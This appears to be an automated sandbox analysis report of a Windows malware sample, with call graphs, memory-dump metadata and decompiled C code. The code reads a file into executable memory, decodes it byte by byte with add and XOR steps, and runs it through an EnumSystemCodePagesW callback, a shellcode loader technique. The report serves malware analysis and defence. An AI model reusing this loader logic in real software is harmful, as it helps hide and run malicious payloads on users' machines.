10816 1b2574 LeaveCriticalSection 10813->10816 10815 1b3ada 10815->10755 10816->10815 10817->10774 10819 1b3c6e 10818->10819 10820 1b3c3f 10818->10820 10823 1b2574 LeaveCriticalSection 10819->10823 10820->10769 10820->10787 10820->10790 10822->10780 10823->10820 10825 1b60d1 ___vcrt_FlsGetValue 5 API calls 10824->10825 10826 1b5fe0 10825->10826 10827 1b5ff8 TlsGetValue 10826->10827 10828 1b1c9d 10826->10828 10827->10828 10828->10797 10828->10798 10828->10805 10830 1b011e 10829->10830 10839 1b012f 10829->10839 10840 1affd9 GetModuleHandleW 10830->10840 10835 1aff91 10835->10126 10847 1b0273 10839->10847 10841 1affe5 10840->10841 10841->10839 10842 1b001c GetModuleHandleExW 10841->10842 10843 1b005b GetProcAddress 10842->10843 10844 1b006f 10842->10844 10843->10844 10845 1b008b 10844->10845 10846 1b0082 FreeLibrary 10844->10846 10845->10839 10846->10845 10848 1b027f __FrameHandler3::FrameUnwindToState 10847->10848 10862 1b255d EnterCriticalSection 10848->10862 10850 1b0289 10863 1b0188 10850->10863 10852 1b0296 10867 1b02b4 10852->10867 10855 1b00c0 10892 1b009e 10855->10892 10858 1b00de 10860 1b001c __FrameHandler3::FrameUnwindToState 3 API calls 10858->10860 10859 1b00ce GetCurrentProcess TerminateProcess 10859->10858 10861 1b00e6 ExitProcess 10860->10861 10862->10850 10865 1b0194 __FrameHandler3::FrameUnwindToState 10863->10865 10864 1b01fb __FrameHandler3::FrameUnwindToState 10864->10852 10865->10864 10870 1b07ae 10865->10870 10891 1b2574 LeaveCriticalSection 10867->10891 10869 1b0167 10869->10835 10869->10855 10871 1b07ba __EH_prolog3 10870->10871 10874 1b0a39 10871->10874 10873 1b07e1 __FrameHandler3::FrameUnwindToState 10873->10864 10875 1b0a45 __FrameHandler3::FrameUnwindToState 10874->10875 10882 1b255d EnterCriticalSection 10875->10882 10877 1b0a53 10883 1b0904 10877->10883 10882->10877 10884 1b0923 10883->10884 10885 1b091b 10883->10885 10884->10885 10886 1b36c3 ___free_lconv_mon 14 API calls 10884->10886 10887 1b0a88 10885->10887 10886->10885 10890 1b2574 LeaveCriticalSection 10887->10890 10889 1b0a71 10889->10873 10890->10889 10891->10869 10897 1b418d GetPEB 10892->10897 10895 1b00a8 GetPEB 10896 1b00ba 10895->10896 10896->10858 10896->10859 10898 1b41a7 10897->10898 10899 1b00a3 10897->10899 10901 1b2329 10898->10901 10899->10895 10899->10896 10902 1b2434 _unexpected 5 API calls 10901->10902 10903 1b2345 10902->10903 10903->10899 10905 1afe86 ___scrt_uninitialize_crt 10904->10905 10906 1afe74 10904->10906 10905->10191 10907 1afe82 10906->10907 10909 1b3d9d 10906->10909 10907->10191 10912 1b3ecc 10909->10912 10915 1b3fa5 10912->10915 10916 1b3fb1 __FrameHandler3::FrameUnwindToState 10915->10916 10923 1b255d EnterCriticalSection 10916->10923 10918 1b4027 10932 1b4045 10918->10932 10920 1b3fbb ___scrt_uninitialize_crt 10920->10918 10924 1b3f19 10920->10924 10923->10920 10925 1b3f25 __FrameHandler3::FrameUnwindToState 10924->10925 10935 1b4051 EnterCriticalSection 10925->10935 10927 1b3f68 10947 1b3f99 10927->10947 10928 1b3f2f ___scrt_uninitialize_crt 10928->10927 10936 1b3da6 10928->10936 11049 1b2574 LeaveCriticalSection 10932->11049 10934 1b3da4 10934->10907 10935->10928 10937 1b3dbb ___std_exception_copy 10936->10937 10938 1b3dcd 10937->10938 10939 1b3dc2 10937->10939 10950 1b3e0b 10938->10950 10941 1b3ecc ___scrt_uninitialize_crt 79 API calls 10939->10941 10944 1b3dc8 ___std_exception_copy 10941->10944 10944->10927 10945 1b3dee 10963 1b64f5 10945->10963 11048 1b4065 LeaveCriticalSection 10947->11048 10949 1b3f87 10949->10920 10951 1b3e24 10950->10951 10955 1b3dd7 10950->10955 10952 1b6614 ___scrt_uninitialize_crt 29 API calls 10951->10952 10951->10955 10953 1b3e40 10952->10953 10974 1b683b 10953->10974 10955->10944 10956 1b6614 10955->10956 10957 1b6620 10956->10957 10958 1b6635 10956->10958 10959 1b47e4 ___free_lconv_mon 14 API calls 10957->10959 10958->10945 10960 1b6625 10959->10960 10961 1b3796 ___std_exception_copy 29 API calls 10960->10961 10962 1b6630 10961->10962 10962->10945 10964 1b6506 10963->10964 10967 1b6513 10963->10967 10965 1b47e4 ___free_lconv_mon 14 API calls 10964->10965 10973 1b650b 10965->10973 10966 1b655c 10968 1b47e4 ___free_lconv_mon 14 API calls 10966->10968 10967->10966 10970 1b653a 10967->10970 10969 1b6561 10968->10969 10971 1b3796 ___std_exception_copy 29 API calls 10969->10971 11015 1b6572 10970->11015 10971->10973 10973->10944 10976 1b6847 __FrameHandler3::FrameUnwindToState 10974->10976 10975 1b690b 10977 1b3922 ___std_exception_copy 29 API calls 10975->10977 10976->10975 10978 1b689c 10976->10978 10984 1b684f 10976->10984 10977->10984 10985 1b5dae EnterCriticalSection 10978->10985 10980 1b68a2 10981 1b68bf 10980->10981 10986 1b663b 10980->10986 11012 1b6903 10981->11012 10984->10955 10985->10980 10987 1b6660 10986->10987 11010 1b6683 ___scrt_uninitialize_crt 10986->11010 10988 1b6664 10987->10988 10990 1b66c2 10987->10990 10989 1b3922 ___std_exception_copy 29 API calls 10988->10989 10989->11010 10991 1b66d9 10990->10991 10992 1b889c ___scrt_uninitialize_crt 31 API calls 10990->10992 10993 1b6943 ___scrt_uninitialize_crt 51 API calls 10991->10993 10992->10991 10994 1b66e3 10993->10994 10995 1b6729 10994->10995 10996 1b66e9 10994->10996 10999 1b673d 10995->10999 11000 1b678c WriteFile 10995->11000 10997 1b6713 10996->10997 10998 1b66f0 10996->10998 11001 1b69c1 ___scrt_uninitialize_crt 56 API calls 10997->11001 11005 1b6d93 ___scrt_uninitialize_crt 6 API calls 10998->11005 10998->11010 11003 1b677a 10999->11003 11004 1b6745 10999->11004 11002 1b67ae GetLastError 11000->11002 11000->11010 11001->11010 11002->11010 11006 1b6dfb ___scrt_uninitialize_crt 7 API calls 11003->11006 11007 1b674a 11004->11007 11008 1b6768 11004->11008 11005->11010 11006->11010 11007->11010 11011 1b6ed6 ___scrt_uninitialize_crt 7 API calls 11007->11011 11009 1b6fbf ___scrt_uninitialize_crt 8 API calls 11008->11009 11009->11010 11010->10981 11011->11010 11013 1b5dd1 ___scrt_uninitialize_crt LeaveCriticalSection 11012->11013 11014 1b6909 11013->11014 11014->10984 11016 1b657e __FrameHandler3::FrameUnwindToState 11015->11016 11028 1b5dae EnterCriticalSection 11016->11028 11018 1b658d 11019 1b65d2 11018->11019 11029 1b5b65 11018->11029 11020 1b47e4 ___free_lconv_mon 14 API calls 11019->11020 11023 1b65d9 11020->11023 11022 1b65b9 FlushFileBuffers 11022->11023 11024 1b65c5 GetLastError 11022->11024 11045 1b6608 11023->11045 11042 1b47f7 11024->11042 11028->11018 11030 1b5b72 11029->11030 11033 1b5b87 11029->11033 11031 1b47f7 ___scrt_uninitialize_crt 14 API calls 11030->11031 11032 1b5b77 11031->11032 11035 1b47e4 ___free_lconv_mon 14 API calls 11032->11035 11034 1b47f7 ___scrt_uninitialize_crt 14 API calls 11033->11034 11036 1b5bac 11033->11036 11037 1b5bb7 11034->11037 11038 1b5b7f 11035->11038 11036->11022 11039 1b47e4 ___free_lconv_mon 14 API calls 11037->11039 11038->11022 11040 1b5bbf 11039->11040 11041 1b3796 ___std_exception_copy 29 API calls 11040->11041 11041->11038 11043 1b273d ___free_lconv_mon 14 API calls 11042->11043 11044 1b47fc 11043->11044 11044->11019 11046 1b5dd1 ___scrt_uninitialize_crt LeaveCriticalSection 11045->11046 11047 1b65f1 11046->11047 11047->10973 11048->10949 11049->10934

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 1a18d0-1a1939 call 1b0fd1 3 1a194b-1a1a1d call 1afc30 CreateFileW GetFileSize VirtualAlloc ReadFile 0->3 4 1a193f-1a1946 0->4 8 1a1a20-1a1ad2 3->8 5 1a206b-1a2077 4->5 9 1a1ad8 8->9 10 1a1add-1a1b01 EnumSystemCodePagesW call 1b0f4d 8->10 9->8 13 1a1b08-1a1b0e 10->13 14 1a1b2c-1a1b63 GetOEMCP call 1b0f42 13->14 15 1a1b14-1a1b27 13->15 18 1a1b69-1a1b70 14->18 19 1a1b75 14->19 15->13 18->5 20 1a1b7c-1a1b82 19->20 21 1a1b88-1a1ba7 call 1b11b7 20->21 22 1a1e82-1a1e89 20->22 31 1a1bb9-1a1bd8 call 1b11b7 21->31 32 1a1bad-1a1bb4 21->32 23 1a1e9b-1a1e9f 22->23 24 1a1e8f-1a1e96 22->24 26 1a1eac-1a1eb0 23->26 27 1a1ea5 23->27 24->5 29 1a1ebd-1a1eec call 1a2080 26->29 30 1a1eb6 26->30 27->26 40 1a1efe-1a1f02 29->40 41 1a1ef2-1a1ef9 29->41 30->29 38 1a1bfe-1a1c1d call 1b11b7 31->38 39 1a1bde-1a1bf9 31->39 34 1a1e74-1a1e7d 32->34 34->20 50 1a1cab-1a1cca call 1b11b7 38->50 51 1a1c23-1a1c2f 38->51 39->34 43 1a1f08-1a1f39 GetStdHandle * 2 40->43 44 1a1fa4-1a1fb8 call 1a23e0 40->44 41->5 47 1a1f3f-1a1f46 43->47 48 1a1f4c-1a1f64 call 1a22b0 43->48 59 1a1fca-1a200f GetStartupInfoW call 1b1219 call 1a2750 44->59 60 1a1fbe-1a1fc5 44->60 47->48 53 1a1f95 47->53 62 1a1f6a-1a1f7e call 1a2340 48->62 63 1a1f90 48->63 67 1a1d58-1a1d77 call 1b11b7 50->67 68 1a1cd0-1a1cdc 50->68 56 1a1c41-1a1c6b call 1b1341 51->56 57 1a1c35-1a1c3c 51->57 58 1a1f9f 53->58 78 1a1c7e-1a1c85 56->78 79 1a1c71-1a1c78 56->79 57->5 65 1a2050-1a2068 call 1a2980 58->65 87 1a2024-1a202f 59->87 88 1a2015-1a201f 59->88 60->5 62->63 83 1a1f84-1a1f8b 62->83 63->58 65->5 91 1a1ddf-1a1dfe call 1b11b7 67->91 92 1a1d7d-1a1d89 67->92 74 1a1cee-1a1d18 call 1b1341 68->74 75 1a1ce2-1a1ce9 68->75 96 1a1d2b-1a1d32 74->96 97 1a1d1e-1a1d25 74->97 75->5 84 1a1c9a-1a1ca1 78->84 85 1a1c8b-1a1c94 78->85 79->78 79->84 83->5 84->5 85->84 90 1a1ca6 85->90 95 1a2034-1a204d ShowWindow 87->95 88->95 90->34 104 1a1e68-1a1e6f 91->104 105 1a1e04-1a1e10 91->105 93 1a1d9b-1a1dc8 call 1b1341 92->93 94 1a1d8f-1a1d96 92->94 107 1a1dda 93->107 108 1a1dce-1a1dd5 93->108 94->5 95->65 100 1a1d47-1a1d4e 96->100 102 1a1d38-1a1d41 96->102 97->96 97->100 100->5 102->100 106 1a1d53 102->106 104->5 109 1a1e22-1a1e51 call 1b1341 105->109 110 1a1e16-1a1e1d 105->110 106->34 107->34 108->5 113 1a1e63 109->113 114 1a1e57-1a1e5e 109->114 110->5 113->34 114->5
    C-Code - Quality: 17%
    			E001A18D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
    				struct _OVERLAPPED* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				struct _OVERLAPPED* _v32;
    				signed short* _v36;
    				void* _v40;
    				void* _v44;
    				long _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				struct _OVERLAPPED* _v64;
    				signed int _v68;
    				long _v72;
    				struct _OVERLAPPED* _v76;
    				signed short _v96;
    				signed int _v100;
    				signed int _v132;
    				char _v144;
    				signed int _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				void* _v164;
    				signed int _v168;
    				signed int _v172;
    				long _v176;
    				void* __edi;
    				struct _OVERLAPPED* _t228;
    				void* _t236;
    				int _t257;
    				signed int _t258;
    				signed int _t259;
    				signed int _t262;
    				signed int _t264;
    				signed int _t267;
    				void* _t279;
    				void* _t280;
    				signed int _t284;
    				signed int _t287;
    				signed int _t290;
    				signed int _t293;
    				signed int _t296;
    				signed int _t299;
    				signed int _t302;
    				signed int _t304;
    				signed int _t312;
    				signed int _t318;
    				signed int _t325;
    				intOrPtr _t350;
    				void* _t399;
    				void* _t402;
    				void* _t406;
    				signed int* _t407;
    				signed int* _t408;
    				intOrPtr* _t409;
    				signed int* _t410;
    				intOrPtr* _t411;
    				signed int* _t412;
    				intOrPtr* _t414;
    
    				_v16 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v28 = 0;
    				_v32 = 0;
    				_v52 = 2;
    				_v64 = 0;
    				_v68 = 0;
    				_v76 = 0;
    				_v176 = 0x3d0900; // executed
    				_t228 = E001B0FD1(); // executed
    				_v76 = _t228;
    				if(_v76 != 0) {
    					E001AFC30(_t399, _v76, 0x54, 0x3d0900);
    					_v44 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0);
    					_v48 = GetFileSize(_v44, 0);
    					_t236 = VirtualAlloc(0, _v48, 0x3000, 0x40); // executed
    					_v40 = _t236;
    					__eflags = 0;
    					ReadFile(_v44, _v40, _v48,  &_v72, 0); // executed
    					_t406 = _t402 - 0xfffffffffffffff0;
    					while(1) {
    						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x1d;
    						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
    						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x17;
    						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
    						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xc4;
    						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000071;
    						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000fc;
    						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xe;
    						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
    						 *(_v40 + _v68) =  *(_v40 + _v68) + 0x44;
    						_v68 = _v68 + 1;
    						__eflags = _v68 - _v48;
    						if(_v68 >= _v48) {
    							break;
    						}
    					}
    					__eflags = 0;
    					_v176 = _v40;
    					_v172 = 0;
    					EnumSystemCodePagesW(??, ??);
    					_t407 = _t406 - 8;
    					 *_t407 = _v76;
    					E001B0F4D();
    					_v68 = 0;
    					while(1) {
    						__eflags = _v68 - _v52;
    						if(_v68 >= _v52) {
    							break;
    						}
    						 *0x1c4918 = 0x1f7;
    						_v68 = _v68 + 1;
    					}
    					_t257 = GetOEMCP();
    					 *0x1c49b8 = _t257;
    					 *0x1c49b4 = _t257;
    					 *0x1c49a4 = 0x32;
    					_t258 =  *0x1c49a4; // 0x0
    					 *_t407 = _t258;
    					_v176 = 4;
    					_t259 = E001B0F42();
    					 *0x1c49a0 = _t259;
    					__eflags = _t259;
    					if(_t259 != 0) {
    						_v68 = 1;
    						while(1) {
    							__eflags = _v68 - _v52;
    							if(_v68 >= _v52) {
    								break;
    							}
    							 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    							_v176 = L"--headless";
    							_t287 = E001B11B7();
    							__eflags = _t287;
    							if(_t287 != 0) {
    								 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    								_v176 = L"--unix";
    								_t290 = E001B11B7();
    								__eflags = _t290;
    								if(_t290 != 0) {
    									 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    									_v176 = L"--width";
    									_t293 = E001B11B7();
    									__eflags = _t293;
    									if(_t293 != 0) {
    										 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    										_v176 = L"--height";
    										_t296 = E001B11B7();
    										__eflags = _t296;
    										if(_t296 != 0) {
    											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    											_v176 = L"--signal";
    											_t299 = E001B11B7();
    											__eflags = _t299;
    											if(_t299 != 0) {
    												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    												_v176 = L"--server";
    												_t302 = E001B11B7();
    												__eflags = _t302;
    												if(_t302 != 0) {
    													_v16 = 1;
    												} else {
    													_t304 = _v68 + 1;
    													_v68 = _t304;
    													__eflags = _t304 - _v52;
    													if(_t304 != _v52) {
    														 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    														_v176 =  &_v36;
    														_v172 = 0;
    														 *0x1c4914 = E001B1341();
    														__eflags =  *_v36;
    														if( *_v36 == 0) {
    															goto L47;
    														} else {
    															_v16 = 1;
    														}
    													} else {
    														_v16 = 1;
    													}
    												}
    											} else {
    												_t312 = _v68 + 1;
    												_v68 = _t312;
    												__eflags = _t312 - _v52;
    												if(_t312 != _v52) {
    													 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    													_v176 =  &_v36;
    													_v172 = 0;
    													_v32 = E001B1341();
    													__eflags =  *_v36;
    													if( *_v36 == 0) {
    														goto L47;
    													} else {
    														_v16 = 1;
    													}
    												} else {
    													_v16 = 1;
    												}
    											}
    										} else {
    											_t318 = _v68 + 1;
    											_v68 = _t318;
    											__eflags = _t318 - _v52;
    											if(_t318 != _v52) {
    												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    												_v176 =  &_v36;
    												_v172 = 0;
    												_v28 = E001B1341();
    												__eflags = _v28;
    												if(_v28 != 0) {
    													L30:
    													__eflags = _v28 - 0xffff;
    													if(_v28 > 0xffff) {
    														goto L32;
    													} else {
    														__eflags =  *_v36 & 0x0000ffff;
    														if(( *_v36 & 0x0000ffff) == 0) {
    															goto L47;
    														} else {
    															goto L32;
    														}
    													}
    												} else {
    													__eflags =  *0x1c4920;
    													if( *0x1c4920 == 0) {
    														L32:
    														_v16 = 1;
    													} else {
    														goto L30;
    													}
    												}
    											} else {
    												_v16 = 1;
    											}
    										}
    									} else {
    										_t325 = _v68 + 1;
    										_v68 = _t325;
    										__eflags = _t325 - _v52;
    										if(_t325 != _v52) {
    											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
    											_v176 =  &_v36;
    											_v172 = 0;
    											_v24 = E001B1341();
    											__eflags = _v24;
    											if(_v24 != 0) {
    												L21:
    												__eflags = _v24 - 0xffff;
    												if(_v24 > 0xffff) {
    													goto L23;
    												} else {
    													__eflags =  *_v36 & 0x0000ffff;
    													if(( *_v36 & 0x0000ffff) == 0) {
    														goto L47;
    													} else {
    														goto L23;
    													}
    												}
    											} else {
    												__eflags =  *0x1c4920;
    												if( *0x1c4920 == 0) {
    													L23:
    													_v16 = 1;
    												} else {
    													goto L21;
    												}
    											}
    										} else {
    											_v16 = 1;
    										}
    									}
    								} else {
    									 *0x1c4920 = 1;
    									 *0x1c4924 = 1;
    									_v20 = 1;
    									goto L47;
    								}
    							} else {
    								_v20 = 1;
    								L47:
    								_v68 = _v68 + 1;
    								continue;
    							}
    							goto L72;
    						}
    						__eflags =  *0x1c4914;
    						if( *0x1c4914 != 0) {
    							__eflags = _v24;
    							if(_v24 == 0) {
    								_v24 = 0x50;
    							}
    							__eflags = _v28;
    							if(__eflags == 0) {
    								_v28 = 0x96;
    							}
    							 *_t407 = 0x1c4914;
    							_v176 = 1;
    							_v172 = _v24;
    							_v168 = _v28;
    							_t262 = E001A2080(__eflags);
    							_t408 = _t407 - 0x10;
    							 *0x1c491c = _t262;
    							__eflags = _t262;
    							if(_t262 != 0) {
    								__eflags = _v20;
    								if(_v20 == 0) {
    									 *_t408 = 0x1c4914;
    									_t264 = E001A23E0(0);
    									_t409 = _t408 - 4;
    									__eflags = _t264;
    									if(_t264 != 0) {
    										 *_t409 =  &_v144;
    										GetStartupInfoW(??);
    										_t410 = _t409 - 4;
    										 *_t410 = _v132;
    										_t267 = E001B1219();
    										 *_t410 = 0x1c4914;
    										_v176 = _v132;
    										_v172 = _t267 << 1;
    										E001A2750();
    										_t411 = _t410 - 0xc;
    										__eflags = _v100 & 0x00000001;
    										if((_v100 & 0x00000001) == 0) {
    											_v148 = 5;
    										} else {
    											_v148 = _v96 & 0x0000ffff;
    										}
    										_t350 =  *0x1c49bc; // 0x0
    										 *_t411 = _t350;
    										_v176 = _v148;
    										ShowWindow(??, ??);
    										_t412 = _t411 - 8;
    										goto L71;
    									} else {
    										_v16 = 1;
    									}
    								} else {
    									 *_t408 = 0xfffffff6;
    									_t279 = GetStdHandle(??);
    									_t414 = _t408 - 4;
    									 *0x1c49c4 = _t279;
    									 *_t414 = 0xfffffff5;
    									_t280 = GetStdHandle(??);
    									_t412 = _t414 - 4;
    									 *0x1c49c8 = _t280;
    									__eflags =  *0x1c49c4;
    									if( *0x1c49c4 != 0) {
    										L59:
    										 *_t412 = 0x1c4914;
    										E001A22B0();
    										_t412 = _t412 - 4;
    										__eflags =  *0x1c4920;
    										if( *0x1c4920 != 0) {
    											L62:
    											goto L64;
    										} else {
    											 *_t412 = 0x1c4914;
    											_t284 = E001A2340();
    											_t412 = _t412 - 4;
    											__eflags = _t284;
    											if(_t284 != 0) {
    												goto L62;
    											} else {
    												_v16 = 1;
    											}
    										}
    									} else {
    										__eflags =  *0x1c49c8;
    										if( *0x1c49c8 == 0) {
    											 *0x1c4928 = 1;
    											L64:
    											L71:
    											 *_t412 = 0x1c4914;
    											_v176 = _v32;
    											_v16 = E001A2980();
    										} else {
    											goto L59;
    										}
    									}
    								}
    							} else {
    								_v16 = 1;
    							}
    						} else {
    							_v16 = 1;
    						}
    					} else {
    						_v16 = 1;
    					}
    				} else {
    					_v16 = 0;
    				}
    				L72:
    				return _v16;
    			}































































    0x001a18e7
    0x001a18ee
    0x001a18f5
    0x001a18fc
    0x001a1903
    0x001a190a
    0x001a1911
    0x001a1918
    0x001a191f
    0x001a1926
    0x001a192d
    0x001a1932
    0x001a1939
    0x001a1961
    0x001a19a7
    0x001a19c3
    0x001a19e6
    0x001a19ef
    0x001a19fe
    0x001a1a17
    0x001a1a1d
    0x001a1a20
    0x001a1a2d
    0x001a1a3c
    0x001a1a4c
    0x001a1a5b
    0x001a1a6e
    0x001a1a7e
    0x001a1a91
    0x001a1aa1
    0x001a1ab0
    0x001a1ac0
    0x001a1ac9
    0x001a1acf
    0x001a1ad2
    0x00000000
    0x00000000
    0x001a1ad8
    0x001a1ae0
    0x001a1ae2
    0x001a1ae5
    0x001a1aed
    0x001a1af3
    0x001a1af9
    0x001a1afc
    0x001a1b01
    0x001a1b08
    0x001a1b0b
    0x001a1b0e
    0x00000000
    0x00000000
    0x001a1b14
    0x001a1b24
    0x001a1b24
    0x001a1b2c
    0x001a1b32
    0x001a1b37
    0x001a1b3c
    0x001a1b46
    0x001a1b4b
    0x001a1b4e
    0x001a1b56
    0x001a1b5b
    0x001a1b60
    0x001a1b63
    0x001a1b75
    0x001a1b7c
    0x001a1b7f
    0x001a1b82
    0x00000000
    0x00000000
    0x001a1b98
    0x001a1b9b
    0x001a1b9f
    0x001a1ba4
    0x001a1ba7
    0x001a1bc9
    0x001a1bcc
    0x001a1bd0
    0x001a1bd5
    0x001a1bd8
    0x001a1c0e
    0x001a1c11
    0x001a1c15
    0x001a1c1a
    0x001a1c1d
    0x001a1cbb
    0x001a1cbe
    0x001a1cc2
    0x001a1cc7
    0x001a1cca
    0x001a1d68
    0x001a1d6b
    0x001a1d6f
    0x001a1d74
    0x001a1d77
    0x001a1def
    0x001a1df2
    0x001a1df6
    0x001a1dfb
    0x001a1dfe
    0x001a1e68
    0x001a1e04
    0x001a1e07
    0x001a1e0a
    0x001a1e0d
    0x001a1e10
    0x001a1e31
    0x001a1e34
    0x001a1e38
    0x001a1e45
    0x001a1e4d
    0x001a1e51
    0x00000000
    0x001a1e57
    0x001a1e57
    0x001a1e57
    0x001a1e16
    0x001a1e16
    0x001a1e16
    0x001a1e10
    0x001a1d7d
    0x001a1d80
    0x001a1d83
    0x001a1d86
    0x001a1d89
    0x001a1daa
    0x001a1dad
    0x001a1db1
    0x001a1dbe
    0x001a1dc4
    0x001a1dc8
    0x00000000
    0x001a1dce
    0x001a1dce
    0x001a1dce
    0x001a1d8f
    0x001a1d8f
    0x001a1d8f
    0x001a1d89
    0x001a1cd0
    0x001a1cd3
    0x001a1cd6
    0x001a1cd9
    0x001a1cdc
    0x001a1cfd
    0x001a1d00
    0x001a1d04
    0x001a1d11
    0x001a1d14
    0x001a1d18
    0x001a1d2b
    0x001a1d2b
    0x001a1d32
    0x00000000
    0x001a1d38
    0x001a1d3e
    0x001a1d41
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a1d41
    0x001a1d1e
    0x001a1d1e
    0x001a1d25
    0x001a1d47
    0x001a1d47
    0x00000000
    0x00000000
    0x00000000
    0x001a1d25
    0x001a1ce2
    0x001a1ce2
    0x001a1ce2
    0x001a1cdc
    0x001a1c23
    0x001a1c26
    0x001a1c29
    0x001a1c2c
    0x001a1c2f
    0x001a1c50
    0x001a1c53
    0x001a1c57
    0x001a1c64
    0x001a1c67
    0x001a1c6b
    0x001a1c7e
    0x001a1c7e
    0x001a1c85
    0x00000000
    0x001a1c8b
    0x001a1c91
    0x001a1c94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a1c94
    0x001a1c71
    0x001a1c71
    0x001a1c78
    0x001a1c9a
    0x001a1c9a
    0x00000000
    0x00000000
    0x00000000
    0x001a1c78
    0x001a1c35
    0x001a1c35
    0x001a1c35
    0x001a1c2f
    0x001a1bde
    0x001a1bde
    0x001a1be8
    0x001a1bf2
    0x00000000
    0x001a1bf2
    0x001a1bad
    0x001a1bad
    0x001a1e74
    0x001a1e7a
    0x00000000
    0x001a1e7a
    0x00000000
    0x001a1ba7
    0x001a1e82
    0x001a1e89
    0x001a1e9b
    0x001a1e9f
    0x001a1ea5
    0x001a1ea5
    0x001a1eac
    0x001a1eb0
    0x001a1eb6
    0x001a1eb6
    0x001a1ec9
    0x001a1ecc
    0x001a1ed4
    0x001a1ed8
    0x001a1edc
    0x001a1ee1
    0x001a1ee4
    0x001a1ee9
    0x001a1eec
    0x001a1efe
    0x001a1f02
    0x001a1faa
    0x001a1fad
    0x001a1fb2
    0x001a1fb5
    0x001a1fb8
    0x001a1fd0
    0x001a1fd3
    0x001a1fd9
    0x001a1fdf
    0x001a1fe2
    0x001a1ff3
    0x001a1ff6
    0x001a1ffa
    0x001a1ffe
    0x001a2003
    0x001a200c
    0x001a200f
    0x001a2029
    0x001a2015
    0x001a2019
    0x001a2019
    0x001a203a
    0x001a2040
    0x001a2043
    0x001a2047
    0x001a204d
    0x00000000
    0x001a1fbe
    0x001a1fbe
    0x001a1fbe
    0x001a1f08
    0x001a1f08
    0x001a1f0f
    0x001a1f15
    0x001a1f18
    0x001a1f1d
    0x001a1f24
    0x001a1f2a
    0x001a1f2d
    0x001a1f32
    0x001a1f39
    0x001a1f4c
    0x001a1f52
    0x001a1f55
    0x001a1f5a
    0x001a1f5d
    0x001a1f64
    0x001a1f90
    0x00000000
    0x001a1f6a
    0x001a1f70
    0x001a1f73
    0x001a1f78
    0x001a1f7b
    0x001a1f7e
    0x00000000
    0x001a1f84
    0x001a1f84
    0x001a1f84
    0x001a1f7e
    0x001a1f3f
    0x001a1f3f
    0x001a1f46
    0x001a1f95
    0x001a1f9f
    0x001a2050
    0x001a2059
    0x001a205c
    0x001a2068
    0x00000000
    0x00000000
    0x00000000
    0x001a1f46
    0x001a1f39
    0x001a1ef2
    0x001a1ef2
    0x001a1ef2
    0x001a1e8f
    0x001a1e8f
    0x001a1e8f
    0x001a1b69
    0x001a1b69
    0x001a1b69
    0x001a193f
    0x001a193f
    0x001a193f
    0x001a206b
    0x001a2077

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: File$AllocCreateReadSizeVirtual
    • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
    • API String ID: 4119528295-967118136
    • Opcode ID: 36c88cda7d9fbc3df30d66a94949c275ce3f13f12deb75227155ceb9223edc15
    • Instruction ID: 2139e2bd75bf9222ce9d5304f5d7157e5417a567ef4a8465ef3eda6c34ec8ccb
    • Opcode Fuzzy Hash: 36c88cda7d9fbc3df30d66a94949c275ce3f13f12deb75227155ceb9223edc15
    • Instruction Fuzzy Hash: CC2249B8809218DFDB14EFA8C994BAEBBF0FF49304F11841DE845AB291D7749985CF12
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 159 1ad720-1ad72b SetUnhandledExceptionFilter
    C-Code - Quality: 100%
    			E001AD720() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E001AD847); // executed
    				return _t1;
    			}




    0x001ad725
    0x001ad72b

    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0000D847,001AD1A3), ref: 001AD725
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
